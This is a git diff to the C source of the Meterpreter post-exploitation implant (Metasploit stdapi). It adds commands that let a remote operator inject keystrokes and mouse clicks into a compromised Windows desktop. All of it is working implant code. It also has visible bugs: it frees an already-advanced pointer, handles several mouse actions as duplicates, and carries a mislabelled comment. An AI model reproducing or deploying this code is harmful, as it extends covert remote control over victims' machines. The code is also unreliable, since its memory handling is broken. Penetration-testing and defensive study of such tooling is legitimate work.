diff --git a/c/meterpreter/source/extensions/stdapi/server/stdapi.c b/c/meterpreter/source/extensions/stdapi/server/stdapi.c index 32d6660e..b5c99b20 100644 --- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c +++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c @@ -143,6 +143,8 @@ Command customCommands[] = COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get), COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set), COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot), + COMMAND_REQ("stdapi_ui_send_keys", request_ui_send_keys), + COMMAND_REQ("stdapi_ui_send_mouse", request_ui_send_mouse), // Event Log COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open), diff --git a/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c b/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c index 52f95317..d0255c1a 100644 --- a/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c +++ b/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c @@ -350,6 +350,48 @@ DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request) return ERROR_SUCCESS; } +/* + * Send keystrokes + */ + +DWORD request_ui_send_keys(Remote *remote, Packet *request) +{ + Packet *response = packet_create_response(request); + DWORD result = ERROR_SUCCESS; + wchar_t *keys = utf8_to_wchar(packet_get_tlv_value_string(request, TLV_TYPE_KEYS_SEND)); + if (keys) + { + INPUT input[2] = {0}; + input[0].type = INPUT_KEYBOARD; + input[0].ki.time = 0; + input[0].ki.wVk = 0; + input[0].ki.dwExtraInfo = 0; + input[0].ki.dwFlags = KEYEVENTF_UNICODE; + input[1].type = INPUT_KEYBOARD; + input[1].ki.time = 0; + input[1].ki.wVk = 0; + input[1].ki.dwExtraInfo = 0; + input[1].ki.dwFlags = KEYEVENTF_UNICODE | KEYEVENTF_KEYUP; + while (*keys != 0) + { + input[0].ki.wScan = *keys; + input[1].ki.wScan = *keys; + SendInput(2, input, sizeof(INPUT)); + keys++; + } + free(keys); + } + else + { + result = 1; + } + + // Transmit the response + packet_transmit_response(result, remote, response); + return ERROR_SUCCESS; +} + + /* * log keystrokes and track active window */ diff --git a/c/meterpreter/source/extensions/stdapi/server/ui/mouse.c b/c/meterpreter/source/extensions/stdapi/server/ui/mouse.c index ae7f7bdd..845ed708 100644 --- a/c/meterpreter/source/extensions/stdapi/server/ui/mouse.c +++ b/c/meterpreter/source/extensions/stdapi/server/ui/mouse.c @@ -34,3 +34,79 @@ DWORD request_ui_enable_mouse(Remote *remote, Packet *request) return ERROR_SUCCESS; } + + +/* + * Send keystrokes + */ + +DWORD request_ui_send_mouse(Remote *remote, Packet *request) +{ + Packet *response = packet_create_response(request); + DWORD result = ERROR_SUCCESS; + + DWORD action = packet_get_tlv_value_uint(request, TLV_TYPE_MOUSE_ACTION); + DWORD x = packet_get_tlv_value_uint(request, TLV_TYPE_MOUSE_X); + DWORD y = packet_get_tlv_value_uint(request, TLV_TYPE_MOUSE_Y); + + INPUT input = {0}; + input.type = INPUT_MOUSE; + input.mi.mouseData = 0; + if (action == 0) + { + input.mi.dwFlags = MOUSEEVENTF_MOVE; + } + else if (action == 1) + { + input.mi.dwFlags = MOUSEEVENTF_LEFTDOWN; + } + else if (action == 2) + { + input.mi.dwFlags = MOUSEEVENTF_LEFTDOWN; + } + else if (action == 3) + { + input.mi.dwFlags = MOUSEEVENTF_LEFTUP; + } + else if (action == 4) + { + input.mi.dwFlags = MOUSEEVENTF_RIGHTDOWN; + } + else if (action == 5) + { + input.mi.dwFlags = MOUSEEVENTF_RIGHTDOWN; + } + else if (action == 6) + { + input.mi.dwFlags = MOUSEEVENTF_RIGHTUP; + } + if (x != -1 || y != -1) + { + double width = GetSystemMetrics(SM_CXSCREEN)-1; + double height = GetSystemMetrics(SM_CYSCREEN)-1; + double dx = x*(65535.0f / width); + double dy = y*(65535.0f / height); + input.mi.dx = (LONG)dx; + input.mi.dy = (LONG)dy; + input.mi.dwFlags |= MOUSEEVENTF_ABSOLUTE; + } + SendInput(1, &input, sizeof(INPUT)); + if (action == 1) + { + input.mi.dwFlags &= ~(MOUSEEVENTF_LEFTDOWN); + input.mi.dwFlags |= MOUSEEVENTF_LEFTUP; + SendInput(1, &input, sizeof(INPUT)); + } + else if (action == 4) + { + input.mi.dwFlags &= ~(MOUSEEVENTF_RIGHTDOWN); + input.mi.dwFlags |= MOUSEEVENTF_RIGHTUP; + SendInput(1, &input, sizeof(INPUT)); + } + + // Transmit the response + packet_transmit_response(result, remote, response); + return ERROR_SUCCESS; +} + + diff --git a/c/meterpreter/source/extensions/stdapi/server/ui/ui.h b/c/meterpreter/source/extensions/stdapi/server/ui/ui.h index d62ae5c2..6738cc28 100644 --- a/c/meterpreter/source/extensions/stdapi/server/ui/ui.h +++ b/c/meterpreter/source/extensions/stdapi/server/ui/ui.h @@ -12,6 +12,9 @@ DWORD request_ui_stop_keyscan(Remote *remote, Packet *request); DWORD request_ui_get_keys(Remote *remote, Packet *request); DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request); +DWORD request_ui_send_keys(Remote *remote, Packet *request); +DWORD request_ui_send_mouse(Remote *remote, Packet *request); + DWORD request_ui_desktop_enum( Remote * remote, Packet * request ); DWORD request_ui_desktop_get( Remote * remote, Packet * request ); DWORD request_ui_desktop_set( Remote * remote, Packet * request ); diff --git a/c/meterpreter/source/extensions/stdapi/stdapi.h b/c/meterpreter/source/extensions/stdapi/stdapi.h index 44934865..72fa6127 100755 --- a/c/meterpreter/source/extensions/stdapi/stdapi.h +++ b/c/meterpreter/source/extensions/stdapi/stdapi.h @@ -187,6 +187,10 @@ #define TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3012 ) #define TLV_TYPE_KEYSCAN_TRACK_ACTIVE_WINDOW MAKE_CUSTOM_TLV( TLV_META_TYPE_BOOL, TLV_TYPE_EXTENSION_STDAPI, 3013 ) +#define TLV_TYPE_KEYS_SEND MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3014 ) +#define TLV_TYPE_MOUSE_ACTION MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3015 ) +#define TLV_TYPE_MOUSE_X MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3016 ) +#define TLV_TYPE_MOUSE_Y MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3017 ) // Event Log #define TLV_TYPE_EVENT_SOURCENAME MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 4000 )